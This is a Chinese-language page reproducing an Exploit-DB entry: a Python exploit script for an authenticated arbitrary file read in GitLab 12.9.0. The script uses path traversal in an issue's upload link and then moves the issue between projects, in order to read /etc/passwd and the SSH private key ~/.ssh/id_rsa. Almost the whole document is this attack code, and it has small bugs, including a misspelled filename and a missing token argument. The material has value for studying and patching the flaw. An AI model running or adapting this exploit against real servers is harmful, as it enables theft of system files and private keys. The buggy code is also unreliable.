Gitlab 12.9.0 – Arbitrary File Read (Authenticated)

• Exploit Database
• 131 阅读

• 作者： Jasper Rasenberg
  日期： 2020-11-19
• 类别：

  • webapps
  平台：

  • ruby
• 来源：https://www.exploit-db.com/exploits/49076/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69

  # Exploit Title: Gitlab 12.9.0 - Arbitrary File Read (Authenticated) # Google Dork: - # Date: 11/15/2020 # Exploit Author: Jasper Rasenberg # Vendor Homepage: https://about.gitlab.com # Software Link: https://about.gitlab.com/install # Version: tested on gitlab version 12.9.0 # Tested on: Kali Linux 2020.3       #You can create as many personal access tokens as you like from your GitLab profile. # Sign in to GitLab. #In the upper-right corner, click your avatar and select Settings. #On the User Settings menu, select Access Tokens. #Choose a name and optional expiry date for the token. #Choose the desired scopes. #Click the Create personal access token button. #Save the personal access token somewhere safe. If you navigate away or refresh your page, and you did not save the token, you must create a new one.   # REFERENCE: https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html   # pip3 install gitlab # pip3 install requests # Use a client cert to verify SSL or set to False   import os import requests import json from time import sleep from gitlab import *   session = requests.Session() session.verify = f&apos;{os.getcwd()}/<cert.pem>&apos; # or set session.verify = False   host = &apos;&apos;   def exploit(projectName, issueTitle, files, token):   gl = Gitlab(host, private_token=token, session=session) gl.auth() p1 = gl.projects.create({&apos;name&apos;: f"{projectName}-1"}) p2 = gl.projects.create({&apos;name&apos;: f"{projectName}-2"})   for i, f in enumerate(files): stripped_f = f.rstrip(&apos;\n&apos;) issue = p1.issues.create({ \ &apos;title&apos;: f"{issueTitle}-{i}", &apos;description&apos;: \ "![a](/uploads/11111111111111111111111111111111/"\ f"../../../../../../../../../../../../../..{stripped_f})"}) print(issue.description) sleep(3) try: issue.move(p2.id) except Exception as e: pass sleep(3)   if __name__ == "__main__":   write_files = [&apos;/etc/passwd&apos;, &apos;~/.ssh/id_rsa&apos;] with open(&apos;senstive_files&apos;, &apos;w&apos;) as sens: for file in write_files: sens.write(file)   files = list(open(&apos;sensitive_files&apos;, &apos;r&apos;)) exploit(&apos;project-1&apos;, &apos;issue-1&apos;, files)